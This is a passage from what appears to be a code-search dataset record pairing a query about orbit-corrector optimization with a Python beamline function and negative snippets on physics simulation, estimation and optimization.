frame'%mn))\n\tchecktime()\n\n\t#---pack\n\tresult['mesh'] = np.array(mesh)\n\tresult['grid'] = np.array(grid)\n\tresult['nframes'] = np.array(nframes)\n\tresult['vecs'] = vecs\n\tattrs['grid_spacing'] = grid_spacing\n\treturn result,attrs", "def identify_divtrans(bed):\n pass", "def computePointSectionArea(self,wingIndex,segmentIndex,eta,xsi):\n # tigl.wingGetUpperPoint(wingIndex, segmentIndex, eta -> y, xsi->x)\n # WARNING there is a slight difference in the area computed with this\n # method ans CPACSCREATOR. At the moment it is undetermined who is more\n # accurate.\n N = 20\n xsi1 = np.linspace(0,1,N)\n upper = np.empty((N,3))\n lower = np.empty((N,3))\n\n\n # t = np.max(np.abs(upper[:][2] - lower[:][2]))\n \n for i in range(N):\n U = self.tigl.wingGetUpperPoint(wingIndex,segmentIndex,eta,xsi1[i])\n L = self.tigl.wingGetLowerPoint(wingIndex,segmentIndex,eta,xsi1[i])\n upper[i] = np.array(U)\n lower[i] = np.array(L)\n v1 = upper[0]-upper[-1]\n v2 = upper[7] - lower[7]\n c = np.abs(upper[0][0] - upper[-1][0])\n t = np.max(np.abs(upper[:][2] - lower[:][2]))\n print(c)\n area = c*0.1*t\n # sys.exit()\n # v1xv2 = np.cross(v1,v2)\n # upper = np.flip(upper,axis=0)\n # wingSectionPoints = np.concatenate((upper, lower))\n # ey_0 = np.array([0,1,0])\n # e_1 = v1xv2\n # # Computes the cross prodct\n # cross = np.cross(ey_0,e_1)\n # normCross = np.linalg.norm(cross)\n # cross = cross/normCross\n # if normCross < 1e-8:\n # # No need to rotate\n # wingSectionPoints = np.delete(wingSectionPoints,1,1)\n # hull = ConvexHull(wingSectionPoints)\n # area = hull.volume\n # else:\n # ab = inner1d(ey_0,e_1)\n # a = np.linalg.norm(ey_0)\n # b = np.linalg.norm(e_1)\n # angle = np.arccos(ab / (a*b))\n # logger.debug(\"angle: \"+str(angle))\n # quat = angle*cross\n # r = R.from_rotvec(quat)\n # # Deletes the y column since the Convex hull will struggle with\n # # a 3d plane otherwise\n # wingSectionPoints = r.apply(wingSectionPoints)\n # wingSectionPoints = np.delete(wingSectionPoints,1,1)\n # hull = ConvexHull(wingSectionPoints)\n # # WARNING since we have built a 2D surface, the function is set up\n # # in a way that this is correct!\n # area = hull.volume\n\n logger.debug(\"Computed section area: \"+str(area))\n\n return area" ]
[ "0.5563447", "0.55561185", "0.55355847", "0.5400956", "0.5346773", "0.5164223", "0.51494545", "0.5128714", "0.5126724", "0.50905246", "0.5079524", "0.5058356", "0.5053756", "0.5040289", "0.50352335", "0.50240916", "0.5023575", "0.50167745", "0.50061435", "0.49880677", "0.4979276", "0.49765912", "0.497521", "0.49707502", "0.4961714", "0.49603733", "0.4955646", "0.49478093", "0.49399075", "0.49365303", "0.49212822", "0.49198762", "0.4916389", "0.49133995", "0.49065515", "0.49048886", "0.49017796", "0.49001706", "0.4870099", "0.48675463", "0.48601115", "0.4844244", "0.4844244", "0.48380366", "0.4834202", "0.48265484", "0.48244828", "0.48201263", "0.48155394", "0.48038357", "0.48018062", "0.4791986", "0.4789894", "0.47746244", "0.47664556", "0.4762008", "0.4756015", "0.47553682", "0.47531027", "0.47494373", "0.4739633", "0.47347695", "0.47304714", "0.4728624", "0.47285685", "0.4724441", "0.47227183", "0.47180545", "0.47154406", "0.47094974", "0.47048315", "0.47001556", "0.4700039", "0.4697311", "0.4692551", "0.46912497", "0.46820435", "0.46747327", "0.4673422", "0.4667888", "0.46651855", "0.46627945", "0.46619123", "0.46423444", "0.4640014", "0.46384132", "0.46365944", "0.46351212", "0.46348232", "0.46345726", "0.46335065", "0.46245652", "0.46237168", "0.46233666", "0.46216357", "0.4619536", "0.461912", "0.46175826", "0.46150276", "0.46142673" ]
0.6365625
0
We want to use this function to optimize parameters for orbit correctors. Indeed, we always need two orbit correctors to do this job.
def analyze_orbit_corrector(OC1, OC2, beamline, phase_beg):
    M = np.identity(4)
    OC_parameters = np.zeros(4)
    for element in beamline:
        M = np.dot(element.M1, M)
    # Since the X and Y are decoupled, we can treat them separately.
    M_x = M[0:2, 0:2]
    M_y = M[2:4, 2:4]
    L1 = [[OC1.length/2], [1]]
    L2 = [[OC2.length/2], [1]]
    M_OC1 = np.array(OC1.M1)[0:2, 0:2]
    M_OC2 = np.array(OC2.M1)[0:2, 0:2]
    # The following part solves for cx_1 and cx_2
    M1_x = np.linalg.multi_dot([M_OC2, M_x, L1])
    M2_x = np.linalg.multi_dot([M_OC2, M_x, M_OC1])
    M_OC_x = np.hstack((M1_x, L2))
    OC_parameters[0:2] = -np.linalg.multi_dot([np.linalg.inv(M_OC_x), M2_x, phase_beg[0:2]])
    # The end of the X-part
    # The following part solves for cy_1 and cy_2
    M1_y = np.linalg.multi_dot([M_OC2, M_y, L1])
    M2_y = np.linalg.multi_dot([M_OC2, M_y, M_OC1])
    M_OC_y = np.hstack((M1_y, L2))
    OC_parameters[2:4] = -np.linalg.multi_dot([np.linalg.inv(M_OC_y), M2_y, phase_beg[2:4]])
    # The end of the Y-part
    return OC_parameters
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def solve_prep(self):\n\n par = self.par\n sol = self.sol\n\n # a. retirement\n sol.m_ret = np.zeros((par.T,par.Nm_ret))\n sol.c_ret = np.zeros((par.T,par.Nm_ret))\n sol.a_ret = np.zeros((par.T,par.Nm_ret))\n sol.inv_v_ret = np.zeros((par.T,par.Nm_ret))\n sol.inv_vm_ret = np.zeros((par.T,par.Nm_ret))\n sol.inv_vn_ret = np.zeros((par.T,par.Nm_ret))\n\n # b. working\n if par.solmethod == 'G2EGM':\n\n sol.c = np.zeros((par.T,par.Nn,par.Nm))\n sol.d = np.zeros((par.T,par.Nn,par.Nm))\n sol.inv_v = np.zeros((par.T,par.Nn,par.Nm))\n sol.inv_vm = np.zeros((par.T,par.Nn,par.Nm))\n sol.inv_vn = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.ucon_c = np.zeros((par.T,par.Nn,par.Nm))\n sol.ucon_d = np.zeros((par.T,par.Nn,par.Nm))\n sol.ucon_v = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.dcon_c = np.zeros((par.T,par.Nn,par.Nm))\n sol.dcon_d = np.zeros((par.T,par.Nn,par.Nm))\n sol.dcon_v = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.acon_c = np.zeros((par.T,par.Nn,par.Nm))\n sol.acon_d = np.zeros((par.T,par.Nn,par.Nm))\n sol.acon_v = np.zeros((par.T,par.Nn,par.Nm))\n sol.con_c = np.zeros((par.T,par.Nn,par.Nm))\n sol.con_d = np.zeros((par.T,par.Nn,par.Nm))\n sol.con_v = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.z = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.w = np.zeros((par.T-1,par.Nb_pd,par.Na_pd))\n sol.wa = np.zeros((par.T-1,par.Nb_pd,par.Na_pd))\n sol.wb = np.zeros((par.T-1,par.Nb_pd,par.Na_pd))\n \n elif par.solmethod == 'NEGM':\n\n sol.c = np.zeros((par.T,par.Nn,par.Nm))\n sol.d = np.zeros((par.T,par.Nn,par.Nm))\n sol.inv_v = np.zeros((par.T,par.Nn,par.Nm))\n sol.inv_vn = np.zeros((0,0,0))\n sol.inv_vm = np.zeros((par.T,par.Nn,par.Nm))\n\n sol.w = np.zeros((par.T-1,par.Nb_pd,par.Na_pd))\n sol.wa = np.zeros((par.T-1,par.Nb_pd,par.Na_pd))\n sol.wb = np.zeros((0,0,0))\n \n sol.c_pure_c = np.zeros((par.T,par.Nb_pd,par.Nm))\n sol.inv_v_pure_c = np.zeros((par.T,par.Nb_pd,par.Nm))", "def optimize_parameters(self):\n pass", "def optimize_parameters(self):\n pass", "def optimize_parameters(self):\n pass", "def optimize(self):\n prm = (self.b,self.c)\n d = self.d\n no = int(d*d)\n bounds = [(-1,1)]*no\n resG = differential_evolution(inpSc.entBias, bounds, args = prm, popsize = 40, disp = False)\n\n xOpt = resG.x\n xOpt = xOpt/(np.linalg.norm(xOpt))\n\n #Refine the global optimization by performing a second local optimizaiton\n x0 = xOpt\n\n res = minimize(inpSc.entBias, x0, args = prm, method='BFGS', options={'disp': False})\n xOpt = res.x\n xOpt = xOpt/(np.linalg.norm(xOpt))\n self.rhoOp = inpSc.getMat(xOpt, d)\n self.Q1 = -res.fun", "def optimize(self):\n # Loop through every WD and WS individually\n wd_array = self.fi_subset.floris.flow_field.wind_directions\n ws_array = self.fi_subset.floris.flow_field.wind_speeds\n for nwsi, ws in enumerate(ws_array):\n\n self.fi_subset.reinitialize(wind_speeds=[ws])\n\n for nwdi, wd in enumerate(wd_array):\n # Find turbines to optimize\n turbs_to_opt = self._turbs_to_opt_subset[nwdi, nwsi, :]\n if not any(turbs_to_opt):\n continue # Nothing to do here: no turbines to optimize\n\n # Extract current optimization problem variables (normalized)\n yaw_lb = self._minimum_yaw_angle_subset_norm[nwdi, nwsi, turbs_to_opt]\n yaw_ub = self._maximum_yaw_angle_subset_norm[nwdi, nwsi, turbs_to_opt]\n bnds = [(a, b) for a, b in zip(yaw_lb, yaw_ub)]\n x0 = self._x0_subset_norm[nwdi, nwsi, turbs_to_opt]\n\n J0 = self._farm_power_baseline_subset[nwdi, nwsi]\n yaw_template = self._yaw_angles_template_subset[nwdi, nwsi, :]\n turbine_weights = self._turbine_weights_subset[nwdi, nwsi, :]\n yaw_template = 
np.tile(yaw_template, (1, 1, 1))\n turbine_weights = np.tile(turbine_weights, (1, 1, 1))\n\n # Define cost function\n def cost(x):\n x_full = np.array(yaw_template, copy=True)\n x_full[0, 0, turbs_to_opt] = x * self._normalization_length\n return (\n - 1.0 * self._calculate_farm_power(\n yaw_angles=x_full,\n wd_array=[wd],\n turbine_weights=turbine_weights\n )[0, 0] / J0\n )\n\n # Perform optimization\n residual_plant = minimize(\n fun=cost,\n x0=x0,\n bounds=bnds,\n method=self.opt_method,\n options=self.opt_options,\n )\n\n # Undo normalization/masks and save results to self\n self._farm_power_opt_subset[nwdi, nwsi] = -residual_plant.fun * J0\n self._yaw_angles_opt_subset[nwdi, nwsi, turbs_to_opt] = (\n residual_plant.x * self._normalization_length\n )\n\n # Finalize optimization, i.e., retrieve full solutions\n df_opt = self._finalize()\n return df_opt", "def FitnessSkopt(inputParams):\n\n elecsusParams = baseParams.copy()\n\n # NOTE: No bPhi as of yet.\n paramDict = {'Bfield': inputParams[0], \"T\": inputParams[1], 'Btheta': np.deg2rad(inputParams[2]), 'Etheta': np.deg2rad(inputParams[3])}\n\n # This is the full dictionary to use on ElecSus.\n elecsusParams.update(paramDict)\n\n # First generate the output transmission as before.\n inputE = np.array([np.cos(elecsusParams[\"Etheta\"]), np.sin(elecsusParams[\"Etheta\"]), 0])\n\n # Call ElecSus to obtain the output electric field.\n try:\n # There may at times be issues with ElecSus, such as when NaN is entered as a variable.\n [outputE] = elecsus.calculate(globalDetuning, inputE, elecsusParams, outputs = [\"E_out\"])\n except:\n print(\"There was an issue in ElecSus, so this iteration will return a figure of merit of 0. Here are the input parameters:\")\n print(\"Input parameters: \" + str(elecsusParams))\n print(\"Input field: \" + str(inputE))\n return 0.0\n \n # Use a Jones matrix to determine the electric field after the action of the second polariser. As this is a single filter, the two polarisers are crossed.\n polariserAngle = elecsusParams[\"Etheta\"] + np.pi/2\n\n # Define the Jones matrix. Though only explicitly defined for the x-y plane, we add the third dimension so that we can use all 3 dimensions of the output field.\n jonesMatrix = np.matrix([[np.cos(polariserAngle)**2, np.sin(polariserAngle)*np.cos(polariserAngle), 0],\n\t\t\t\t\t\t\t\t[np.sin(polariserAngle)*np.cos(polariserAngle), np.sin(polariserAngle)**2, 0],\n [0, 0, 1]])\n\n # Get the output from the filter and the polarisers.\n singleFilterOutputE = np.array(jonesMatrix * outputE)\n\n # Get the transmission.\n singleFilterTransmission = (singleFilterOutputE * singleFilterOutputE.conjugate()).sum(axis=0)\n\n ENBW = ((integrate(singleFilterTransmission, globalDetuning)/singleFilterTransmission.max().real)/1e3).real\n\n figureOfMerit = (singleFilterTransmission.max()/ENBW).real\n \n if np.isnan(figureOfMerit):\n # Usually occurs in the case of high temperatures and B fields, since the transmission is just a flat line.\n print(\"Figure of merit is NaN! Here are the input parameters:\")\n print(str(elecsusParams))\n return 0.0\n else:\n return -1.0 * figureOfMerit", "def set_up_orbit_correctors(ps_beg, delay, id_slice1, ds_slice, zplot, id_slices, U_core, lambdaref):\n SXSS = Chicane(3.2716, 0.362, 0.830399, delay[0])\n HXSS = Chicane(3.2, 0.3636, 0.5828, delay[1])\n\n OC2 = [CORR08, D1_SXSS, SXSS, D2_SXSS, QUAD09, CORR09]\n OC3 = [CORR15, D1_HXSS, HXSS, D2_HXSS, QUAD16, CORR16]\n\n ps_end1 = beam_transportation(ps_beg, U_core[0])\n\n # ps_end1 is a 4-by-N array. 
N is the number of macro-particles. It is the full\n # 4D phase space distribution at the end of the first undulator section.\n\n # The id of the slice on the axis in the second undulator section\n on_axis_id_U2 = int(id_slice1+delay[0]/ds_slice+ (8*110)*lambdaref/ds_slice) # The last part is slippage\n\n print(on_axis_id_U2)\n\n ps_end_slice1 = beam_property_along_s(ps_end1, id_slices)[0:4, :]\n ps_on_axis_2 = np.ravel(ps_end_slice1[:, on_axis_id_U2])\n\n # print(ps_on_axis_2)\n\n OC2_optimized = analyze_orbit_corrector(OC2[0], OC2[-1], OC2[1:-1], ps_on_axis_2)\n print(OC2_optimized)\n CORR08_new = Orbit_Corrector(OC2[0].length, OC2_optimized[0], OC2_optimized[2])\n CORR09_new = Orbit_Corrector(OC2[-1].length, OC2_optimized[1], OC2_optimized[3])\n\n # The whole U2 with optimized orbit correctors\n U2_new = [CORR08_new] + OC2[1:-1] + [CORR09_new] + U_core[1]\n ps_end2 = beam_transportation(ps_end1, U2_new)\n\n # ps_end2 is a 4-by-N array. N is the number of macro-particles. It is the full\n # 4D phase space distribution at the end of the second undulator section.\n\n # The id of the slice on the axis in the third undulator section\n on_axis_id_U3 = int(id_slice1+(delay[0]+delay[1])/ds_slice +(14*110*lambdaref)/ds_slice) # The last term is the slipage\n\n print(on_axis_id_U3)\n\n ps_end_slice2 = beam_property_along_s(ps_end2, id_slices)[0:4, :]\n ps_on_axis_3 = np.ravel(ps_end_slice2[ :, on_axis_id_U3])\n\n # print(ps_on_axis_3)\n\n OC3_optimized = analyze_orbit_corrector(OC3[0], OC3[-1], OC3[1:-1], ps_on_axis_3)\n print(OC3_optimized)\n CORR15_new = Orbit_Corrector(OC3[0].length, OC3_optimized[0], OC3_optimized[2])\n CORR16_new = Orbit_Corrector(OC3[-1].length, OC3_optimized[1], OC3_optimized[3])\n\n U3_new = [CORR15_new] + OC3[1:-1] + [CORR16_new] + U_core[2]\n\n Undulator_Beamline = U_core[0]+U2_new+U3_new\n\n return Undulator_Beamline", "def calc(self):\n\n # the following if query ensures that volume- and interaction-terms\n # are only calculated if tau > 0.\n # (to avoid nan-values from invalid function-evaluations)\n\n if self.V.tau.shape == (1,):\n Isurf = self.surface()\n # differentiation for non-existing canopy, as otherwise NAN values\n if self.V.tau > 0.:\n Ivol = self.volume()\n if self.int_Q is True:\n Iint = self.interaction()\n else:\n Iint = np.array([0.])\n else:\n Ivol = np.array([0.])\n Iint = np.array([0.])\n else:\n # calculate surface-term (valid for any tau-value)\n Isurf = self.surface()\n\n # store initial parameter-values\n old_t_0 = self.t_0\n old_p_0 = self.p_0\n old_t_ex = self.t_ex\n old_p_ex = self.p_ex\n\n old_tau = self.V._get_tau()\n old_omega = self.V._get_omega()\n old_NN = self.SRF._get_NormBRDF()\n\n # set mask for tau > 0.\n mask = old_tau > 0.\n valid_index = np.where(mask)\n inval_index = np.where(~mask)\n\n # set parameter-values to valid values for calculation\n self.t_0 = old_t_0[valid_index[0]]\n self.p_0 = old_p_0[valid_index[0]]\n self.t_ex = old_t_ex[valid_index[0]]\n self.p_ex = old_p_ex[valid_index[0]]\n\n # squeezing the arrays is necessary since the setter-function for\n # tau, omega and NormBRDF automatically adds an axis to the arrays!\n self.V.tau = np.squeeze(old_tau[valid_index[0]])\n if np.array(self.V.omega).size != 1:\n self.V.omega = np.squeeze(old_omega[valid_index[0]])\n if np.array(self.SRF.NormBRDF).size != 1:\n self.SRF.NormBRDF = np.squeeze(old_NN[valid_index[0]])\n\n # calculate volume and interaction term where tau-values are valid\n _Ivol = self.volume()\n if self.int_Q is True:\n _Iint = self.interaction()\n else:\n 
_Iint = np.full_like(self.t_0, 0.)\n\n # reset parameter values to old values\n self.t_0 = old_t_0\n self.p_0 = old_p_0\n self.t_ex = old_t_ex\n self.p_ex = old_p_ex\n\n # squeezing the arrays is necessary since the setter-function for\n # tau, omega and NormBRDF automatically add an axis to the arrays!\n self.V.tau = np.squeeze(old_tau)\n self.V.omega = np.squeeze(old_omega)\n self.SRF.NormBRDF = np.squeeze(old_NN)\n\n # combine calculated volume-contributions for valid tau-values\n # with zero-arrays for invalid tau-values\n Ivol = np.ones_like(self.t_0)\n Ivol[valid_index[0]] = _Ivol\n Ivol[inval_index[0]] = np.ones_like(Ivol[inval_index[0]]) * 0.\n\n # combine calculated interaction-contributions for valid tau-values\n # with zero-arrays for invalid tau-values\n if self.int_Q is True:\n Iint = np.ones_like(self.t_0)\n Iint[valid_index[0]] = _Iint\n Iint[inval_index[0]] = np.ones_like(Iint[inval_index[0]]) * 0.\n else:\n Iint = np.full_like(self.t_0, 0.)\n\n return Isurf + Ivol + Iint, Isurf, Ivol, Iint", "def solve(\n self,\n projections: Projections,\n initial_squad: Squad,\n next_gw: int = None,\n force_chips: Dict[int, str] = None,\n force_players: Dict[str, list] = None,\n force_transfers: Dict[int, dict] = None,\n price_changes: Dict[str, Iterable] = None,\n time_limit: float = None,\n optimizer: type = pulp.GUROBI,\n message: bool = True\n ):\n if next_gw is None:\n next_gw = sorted([int(column.split('_')[0]) for column in projections.columns if column.endswith('Pts')])[0]\n # Set up useful references\n initial_players = initial_squad.players\n initial_itb = initial_squad.itb\n initial_fts = initial_squad.fts\n active_chip = initial_squad.active_chip\n players = projections.index\n positions = ('G', 'D', 'M', 'F')\n teams = projections['Team'].unique()\n gw_interval = list(range(next_gw, next_gw + self.horizon))\n\n # Initialise optimisation model\n prob = LpProblem('FPL_transfer_optimisation')\n\n # Initialise decision variables\n default_args = {'index': players, 'columns': gw_interval, 'column_type': 'gw', 'model': prob}\n lineup = DecisionMatrix.lp_variable('lineup', **default_args)\n bench_gk = DecisionMatrix.lp_variable('bench_gk', **default_args)\n bench_1 = DecisionMatrix.lp_variable('bench_1', **default_args)\n bench_2 = DecisionMatrix.lp_variable('bench_2', **default_args)\n bench_3 = DecisionMatrix.lp_variable('bench_3', **default_args)\n squad = DecisionMatrix.lp_variable('squad', **default_args)\n prob += squad == lineup + bench_gk + bench_1 + bench_2 + bench_3\n squad[next_gw - 1] = pd.Series(squad.index).isin(initial_players).astype(int)\n captain = DecisionMatrix.lp_variable('captain', **default_args)\n vice_captain = DecisionMatrix.lp_variable('vice_captain', **default_args)\n transfer_in = DecisionMatrix.lp_variable('transfer_in', **default_args)\n transfer_out = DecisionMatrix.lp_variable('transfer_out', **default_args)\n itb = DecisionSeries(data=[initial_itb], index=[next_gw - 1], model=prob)\n # itb is previous GW's itb + revenue from outgoing players + cost of incoming players\n for i, gw in enumerate(gw_interval):\n itb[gw] = itb[gw - 1] + (transfer_out[gw] * projections['SV']).sum() - \\\n (transfer_in[gw] * projections['BV']).sum() - self.budget_decay_rate\n\n # Add problem constraints to optimisation model\n prob += squad == squad.lag(1) + transfer_in - transfer_out # New squad is previous squad plus transfers\n prob += squad.drop(next_gw - 1, axis=1) <= 1 # Each player can only appear in the squad once\n prob += lineup.sum() == 11 # Lineup contains 11 
players\n prob += bench_gk.sum() == 1 # There is 1 bench GK;\n prob += bench_1.sum() == 1 # 1 1st bench slot;\n prob += bench_2.sum() == 1 # 1 2nd bench slot;\n prob += bench_3.sum() == 1 # 1 3rd bench slot;\n prob += captain.sum() == 1 # 1 Captain;\n prob += transfer_out.sum() == transfer_in.sum() # Transfers in must be same as transfers out\n\n prob += vice_captain.sum() == 1 # 1 vice-captain\n prob += captain <= lineup # Captain must be in lineup\n prob += vice_captain <= lineup # Vice-captain must be in lineup\n prob += captain + vice_captain <= 1 # Captain and vice-captain must be different players\n for position, limit in zip(positions, (2, 5, 5, 3)):\n prob += squad[projections['Pos'] == position].sum() == limit # Set squad position structure\n for team in teams:\n prob += squad[projections['Team'] == team].sum() <= 3 # No more than 3 players from each team\n if self.exclude_everton:\n prob += squad[projections['Team'] == 'Everton'].sum() == 0 # Option to exclude Everton players\n prob += bench_gk <= (projections['Pos'] == 'G') # Bench GK must be a goalkeeper\n prob += (lineup * (projections['Pos'] == 'G')).sum() == 1 # There must be 1 goalkeeper in lineup\n prob += (lineup * (projections['Pos'] == 'D')).sum() >= 3 # There must be at least 3 defenders in lineup\n prob += itb[[False] + [True] * self.horizon] >= 0 # The itb amount must be non-negative for future GWs\n\n # Set up transfer logic\n transfer_args = {'index': gw_interval, 'column_type': 'gw', 'model': prob, 'cat': 'Integer'}\n aux = DecisionSeries.lp_variable('aux', **transfer_args)\n free_transfers = DecisionSeries(data=[initial_fts], index=[next_gw - 1], model=prob) + DecisionSeries.\\\n lp_variable('free_transfers', **transfer_args)\n penalised_transfers = DecisionSeries.lp_variable('penalised_transfers', **transfer_args)\n transfer_counts = transfer_in.sum()\n frees_minus_transfers = free_transfers.lag(1) - transfer_counts\n lower_bound = aux * 15 - 14\n upper_bound = aux * 2\n if initial_fts > 1:\n prob += transfer_counts[next_gw] >= 1\n prob += frees_minus_transfers >= lower_bound\n prob += frees_minus_transfers <= upper_bound\n prob += free_transfers == aux + 1\n # penalised_transfers is max(transfers - frees, 0)\n prob += penalised_transfers >= -frees_minus_transfers\n prob += penalised_transfers >= 0\n\n ev_values = projections[[f'{gw}_Pts' for gw in gw_interval]] # Restructure projections data for easier\n ev_values.columns = gw_interval # manipulation\n objective = ((lineup + captain) * ev_values).sum() # Objective function is sum of lineup and captain pts\n objective += (vice_captain * self.vc_weight * ev_values).sum() # Add vice-captain weight\n for loc, bench_slot in enumerate((bench_gk, bench_1, bench_2, bench_3)):\n objective += (bench_slot * ev_values).sum() * self.bench_weights[:, loc] # Add bench weights to objective\n if force_transfers is None:\n objective -= penalised_transfers * 4 # Take away 4 points from each hit taken\n if force_chips is not None:\n self.force_chips = force_chips\n for gw in force_chips:\n if force_chips[gw] == 'wildcard':\n objective[gw] += penalised_transfers[gw] * 4 # Remove penalised points in wildcard week\n\n if force_players is not None:\n for player in force_players['include']:\n prob += squad.T[player].drop(next_gw - 1) == 1\n for player in force_players['exclude']:\n prob += squad.T[player].drop(next_gw - 1) == 0\n if 'include_for_gw' in force_players:\n for gw in force_players['include_for_gw']:\n try:\n prob += squad[force_players['include_for_gw'][gw], gw] == 1\n 
except ValueError:\n pass\n if 'exclude_for_gw' in force_players:\n for gw in force_players['exclude_for_gw']:\n try:\n prob += squad[force_players['exclude_for_gw'][gw], gw] == 0\n except ValueError:\n pass\n self.rolls = frees_minus_transfers + penalised_transfers\n prob += self.rolls <= 2\n\n if self.penalties is not None:\n if time_decay in self.penalties:\n self.penalties[time_decay] = self.penalties.pop(time_decay) # Apply time decay after other penalties\n for penalty, parameter in self.penalties.items():\n objective = penalty(objective, self, parameter) # Apply external penalty functions\n\n # Apply price change EV\n if price_changes is not None:\n gws_remaining = 38 - next_gw + 1\n for player in price_changes['rise']:\n objective[next_gw] += self.million_value / 30 * squad[player, next_gw] * gws_remaining\n for player in price_changes['drop']:\n objective[next_gw] -= self.million_value / 10 * squad[player, next_gw] * gws_remaining\n\n prob.model += objective.sum()\n prob.solve(time_limit=time_limit, optimizer=optimizer, message=message)\n\n return Solution(lineup, bench_gk, bench_1, bench_2, bench_3, captain, vice_captain, objective, transfer_in,\n transfer_out, itb, projections, free_transfers, penalised_transfers, force_chips)", "def _solve_explicit(self, initial_conditions):\n coeff = self.a ** 2 * self.tau / self.h ** 2\n current_solution = initial_conditions\n next_solution = np.empty_like(current_solution)\n solutions = []\n\n for t in self.t_grid:\n next_solution[1:-1] = (\n current_solution[1:-1]\n + (current_solution[:-2] - 2 * current_solution[1:-1] + current_solution[2:]) * coeff\n ) + self.rhs(self.x_grid[1:-1], t) * self.tau\n\n # left bc\n if self.left_bc_type == \"DIRICHLET\":\n next_solution[0] = self.left_bc(t)\n elif self.left_bc_type == \"NEUMANN\":\n next_solution[0] = (\n 4 * next_solution[1]\n - next_solution[2]\n - 2 * self.h * self.left_bc(t)\n ) / 3.0\n\n # right bc\n if self.right_bc_type == \"DIRICHLET\":\n next_solution[-1] = self.right_bc(t)\n elif self.right_bc_type == \"NEUMANN\":\n next_solution[-1] = (\n 4 * next_solution[-2]\n - next_solution[-3]\n + 2 * self.h * self.right_bc(t)\n ) / 3.0\n if self.mode == \"VISUALIZATION\":\n solutions.append((t, next_solution.copy()))\n current_solution = next_solution\n if self.mode == \"TEST\":\n # print(\"Result: \", current_solution.tolist())\n # print(\"Right answer: \", self.anl_solution.tolist())\n self._norma(current_solution)\n elif self.mode == \"VISUALIZATION\":\n return solutions", "def solve(self):\n \n # Check if cost is available for both estimators\n if not self.est0.cost_avail or not self.est1.cost_avail:\n self.comp_cost = False\n \n # Initial estimate from the input node\n if self.comp_cost:\n z0, zvar0, cost0 = self.est0.est_init(return_cost=True)\n else:\n z0, zvar0 = self.est0.est_init(return_cost=False)\n cost0 = 0\n self.z0 = z0\n self.zvar0 = zvar0\n self.cost0 = cost0\n \n # Initialize other variables\n self.var_cost0 = 0\n self.var_cost1 = 0\n self.cost = 0\n self.s = np.zeros(self.shape1)\n \n for it in range(self.nit):\n \n # Forward transform to est1\n t0 = time.time()\n rvar1_new = self.A.var_dot(self.zvar0)\n rvar1_rep = common.repeat_axes(rvar1_new,self.shape1,\\\n self.var_axes1,rep=False)\n z1_mult = self.A.dot(self.z0)\n r1_new = z1_mult - rvar1_rep*self.s\n \n # Damping\n if it > 0: \n self.r1 = (1-self.step)*self.r1 + self.step*r1_new\n self.rvar1 = (1-self.step)*self.rvar1 + self.step*rvar1_new\n else:\n self.r1 = r1_new\n self.rvar1 = rvar1_new\n\n # Estimator 1 \n if 
self.comp_cost: \n z1, zvar1, cost1 = self.est1.est(self.r1, self.rvar1, return_cost=True) \n if not self.map_est:\n cost1 -= self.cost_adjust(self.r1,z1,self.rvar1,zvar1,\\\n self.shape1,self.var_axes1)\n else:\n z1, zvar1 = self.est1.est(self.r1, self.rvar1, return_cost=False) \n cost1 = 0\n self.z1 = z1\n self.zvar1 = zvar1\n self.cost1 = cost1 \n con_new = np.mean(np.abs(z1-z1_mult)**2) \n \n # Reverse nonlinear transform to est 0\n self.s = (self.z1-self.r1)/rvar1_rep\n self.sprec = 1/self.rvar1*(1-self.zvar1/self.rvar1)\n t1 = time.time()\n self.time_est1 = t1-t0\n \n # Reverse linear transform to est 0 \n rvar0_new = 1/self.A.var_dotH(self.sprec)\n rvar0_rep = common.repeat_axes(rvar0_new,self.shape0,\\\n self.var_axes0,rep=False)\n r0_new = self.z0 + rvar0_rep*self.A.dotH(self.s)\n \n # Damping\n if it > 0:\n self.r0 = (1-self.step)*self.r0 + self.step*r0_new\n self.rvar0 = (1-self.step)*self.rvar0 + self.step*rvar0_new\n else:\n self.r0 = r0_new\n self.rvar0 = rvar0_new\n \n \n # Estimator 0\n if self.comp_cost:\n z0, zvar0, cost0 = self.est0.est(self.r0, self.rvar0, return_cost=True)\n if not self.map_est:\n cost0 -= self.cost_adjust(self.r0,z0,self.rvar0,zvar0,\\\n self.shape0,self.var_axes0)\n \n else:\n z0, zvar0 = self.est0.est(self.r0, self.rvar0, return_cost=False)\n cost0 = 0\n self.z0 = z0\n self.zvar0 = zvar0\n self.cost0 = cost0 \n\n \n # Compute total cost and constraint \n cost_new = self.cost0 + self.cost1 \n if not self.map_est:\n cost_new += self.cost_gauss()\n \n # Step size adaptation\n if (self.step_adapt) and (it > 0):\n if (con_new < self.con):\n self.step = np.minimum(1,self.step_inc*self.step)\n else:\n self.step = np.maximum(self.step_min, self.step_dec*self.step)\n self.cost=cost_new\n self.con=con_new\n \n t2 = time.time()\n self.time_est0 = t2-t1\n self.time_iter = t2-t0\n \n # Print progress\n if self.prt_period > 0:\n if (it % self.prt_period == 0):\n if self.comp_cost:\n print(\"it={0:4d} cost={1:12.4e} con={2:12.4e} step={3:12.4e}\".format(\\\n it, self.cost, self.con, self.step))\n else:\n print(\"it={0:4d} con={1:12.4e}\".format(\\\n it, self.con))\n \n # Save history\n self.save_hist()", "def optimizeposition(areas, omegas, x0, x1, z0, z1):\n\n # initial position of each quadpoint is at the center\n # of the edge connecting the midpoint and a corner point\n rhos = 0.5 * ones(4)\n a = 1 / sqrt(3)\n deltarhos = 0.25 * ones(4) # delta for finite differences\n\n while True: # while method has not converged\n # print(\"################## new iteration #############\")\n rhs = f(rhos, omegas, a, x0, x1, z0, z1, areas)\n print(\"##\")\n print(rhs)\n print(rhos)\n if norm(rhs) < 1e-5:\n break\n mat = df(rhos, omegas, a, x0, x1, z0, z1, areas, deltarhos)\n update = solve(mat, rhs)\n\n rhos += update\n # for i in range(4):\n # rhos[i] = max(0,min(1,rhos[i]))\n \"\"\"\n print(\"the norm of the rhs is \")\n print(norm(rhs))\n print(mat)\n print(\"rhs\")\n print(rhs)\n print(update)\n print(\"rhos\")\n print(rhos)\n \"\"\"\n # print(alpha)\n return rhos", "def optimize_parameters(self):\r\n # forward\r\n self.forward() # compute fake image/video and reconstruction image/video\r\n\r\n # D_A\r\n self.set_requires_grad([self.D_V], True)\r\n 